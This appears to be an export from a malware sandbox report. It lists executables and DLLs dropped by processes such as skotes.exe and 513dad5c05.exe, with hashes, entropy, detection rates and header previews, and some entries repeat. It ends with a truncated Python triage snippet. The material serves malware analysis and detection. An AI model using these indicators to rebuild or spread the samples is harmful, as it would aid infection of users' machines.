                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):685392
                                                                                                                                                                                                                              Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                               • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):608080
                                                                                                                                                                                                                              Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                               • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):450024
                                                                                                                                                                                                                              Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                               • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2046288
                                                                                                                                                                                                                              Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                               • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257872
                                                                                                                                                                                                                              Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80880
                                                                                                                                                                                                                              Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
Size (bytes):4017
Entropy (8bit):5.365271649872934
Encrypted:false
SSDEEP:96:iqbYqGSI6ou/fmOYqSqtzHeqKksvoqdqZ4UqqI9FRWTxvqh:iqbYqGcn/uHqXtzHeqKksvoqdqZrqqSd
MD5:E8835F191292F770FBB89F7D59E5F3C5
SHA1:322904095315FC60F6A32C2B0D2BB8CA7F00C134
SHA-256:427FE9AF874FFC7936AEB39E9FED3C07BA98F61F534FE8594159F111416EDD82
SHA-512:D62C675812AE180DE51B031496EDE6D032BFDC0441071951AADBCE493A206E4C7675CE51C0193DBB705CE0E98D247EDBCA6B23FF79AC9AB23F0D04E7EEADB6B2
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\

Process:C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
File Type:CSV text
Category:modified
Size (bytes):1058
Entropy (8bit):5.356262093008712
Encrypted:false
SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
MD5:B2EFBF032531DD2913F648E75696B0FD
SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:V:V
MD5:CFCD208495D565EF66E7DFF9F98764DA
SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:false
Reputation:unknown
Preview:0

Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):242176
Entropy (8bit):6.47050397947197
Encrypted:false
SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:2ECB51AB00C5F340380ECF849291DBCF
SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):685392
Entropy (8bit):6.872871740790978
Encrypted:false
SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:550686C0EE48C386DFCB40199BD076AC
SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):21
Entropy (8bit):3.880179922675737
Encrypted:false
SSDEEP:3:gFsR0GOWW:gyRhI
MD5:408E94319D97609B8E768415873D5A14
SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:false
Reputation:unknown
Preview:9tKiK3bsYm4fMuK47Pk3s

Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):608080
Entropy (8bit):6.833616094889818
Encrypted:false
SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):450024
Entropy (8bit):6.673992339875127
Encrypted:false
SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:5FF1FCA37C466D6723EC67BE93B51442
SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2046288
Entropy (8bit):6.787733948558952
Encrypted:false
SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:true
Antivirus:
• ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1881088
Entropy (8bit):7.936505097294003
Encrypted:false
SSDEEP:49152:/1nIgasOJRRBXvNgwKNFKcMhO2ow+GrmlLq8:/lLasOJhXFgZB1w+GrE
MD5:8A1AE39FD06F240834EE7731E4470D2F
SHA1:CECA8F3CA15649D9109DD3CDB5BF990478606FBA
SHA-256:AD388620D15362F0DBD39DC6FFD7E8622155D79D36061E6EE0159158DF0A4AD8
SHA-512:FE9D0DB82058F55FABE9281E02435603C33AF38C9FAD5A0A6B2289AD0883D251D20CD7649AC8A97FDEE30994AA77A97D69E30D7BBD3EA4080160E2504ECBCD51
Malicious:true
Antivirus:
• Avira, Detection: 100%
• Joe Sandbox ML, Detection: 100%
• Joe Sandbox ML, Detection: 100%
• ReversingLabs, Detection: 38%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@.........................................................................[.A.o.....@.....................................................H....................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... . (...A.....................@...mptavxer......i.....................@...supuhgzh.....p......................@....taggant.0......."..................@...........................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2832896
Entropy (8bit):6.5165667331631
Encrypted:false
SSDEEP:24576:U/MZ4RuXej5GiT4IBFSKW9aYjXTYflrJT77LSk+9DgpTqYs7Qwc2gh1lnd4qaCmP:h/edtxgV9Xf9Dgp+Y0Qoghjnr+gU1kM
MD5:FE5BD55DB7C14A3864CE057F8738AE39
SHA1:C13D0A62DC8F834FDAA9E780E9258ED2F1A58EED
SHA-256:7D9E4AF11845E1A8490A2A0D5D71670EBC3FA21B0A8F16656661396A9053CF2E
SHA-512:E586A3429335357307DEAB56EC16618935B152B1ECB5C016B29EE1F96D89456CC8805069AFC63CA84DA458261BEFE67C5204C7ACD18EAC5BD3D49E5C641D326C
Malicious:true
Antivirus:
• Avira, Detection: 100%
• Joe Sandbox ML, Detection: 100%
• Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+.......+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...kiohytmd..*.......*..h..............@...gbzfitgk. ...`+.......+.............@....taggant.@....+.."....+.............@...................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2989568
Entropy (8bit):6.518795012161611
Encrypted:false
SSDEEP:49152:HPwL/gU97fpS9iZXovvQyWVkeRJFm0w7KwKz:vwLY47fpkyYvv7sbP
MD5:3799F4F2CFC27184CE70913F4EC3A8BE
SHA1:4424871CDFD4F9B4FB1039049A75844401A7C358
SHA-256:F95DF3026CF4EDCC3D334BFC20D188DE06EA4E4497E94C63504B2B783DC3E55E
SHA-512:F38B986C639EB2C676E0ECD9316CEA437934550D772F5494E2589626E826A5D23954398C3E4EB4584594E5E6CBEA28FFE195BEA27D2674F1A8119CA14EE869A0
Malicious:true
Antivirus:
• Avira, Detection: 100%
• Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......Q....@.................................W...k.............................1..............................-1..................................................... . ............................@....rsrc...............................@....idata ............................@...uyzzfcwd..*.......*.................@...cnrltnzy.....@1......x-.............@....taggant.0...P1.."...|-.............@...........................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1114112
Entropy (8bit):7.7336985855739355
Encrypted:false
SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
MD5:EF08A45833A7D881C90DED1952F96CB4
SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
Malicious:true
Antivirus:
• Joe Sandbox ML, Detection: 100%
• ReversingLabs, Detection: 67%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..
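The identity fields in these dropped-file entries (size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512) can be recomputed offline for any drop recovered from a host, and the verdict columns can be triaged mechanically. What follows is an added example, not code from the Joe Sandbox report: it reproduces those fields for a file's bytes and applies three triage rules to the dropped-file records transcribed from this section. The record field names, the packed-entropy threshold of 7.0 bits per byte and the rule names are this example's own assumptions.

```python
"""Recompute sandbox file-identity fields and triage dropped-file records.

Added example, not part of the Joe Sandbox report. The DROPPED records are
transcribed from the entries above; thresholds and field names are assumed.
"""
import hashlib
import math
from collections import Counter

# SHA-256 of the submitted sample (file.exe) from the report header.
SUBMITTED_SHA256 = "f95df3026cf4edcc3d334bfc20d188de06ea4e4497e94c63504b2b783dc3e55e"

# Entropy (bits/byte) above which a PE is treated as packed or encrypted.
# Heuristic chosen for this example, not a value printed by the sandbox.
PACKED_ENTROPY = 7.0

# Dropped-file records transcribed from the report entries above:
# dropping process, size, 8-bit entropy, SHA-256, sandbox verdict and
# per-scanner detection rate in percent.
DROPPED = [
    {"process": "513dad5c05.exe", "size": 2046288, "entropy": 6.787733948558952,
     "sha256": "AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5",
     "malicious": True, "av": {"ReversingLabs": 0}},
    {"process": "skotes.exe", "size": 1881088, "entropy": 7.936505097294003,
     "sha256": "AD388620D15362F0DBD39DC6FFD7E8622155D79D36061E6EE0159158DF0A4AD8",
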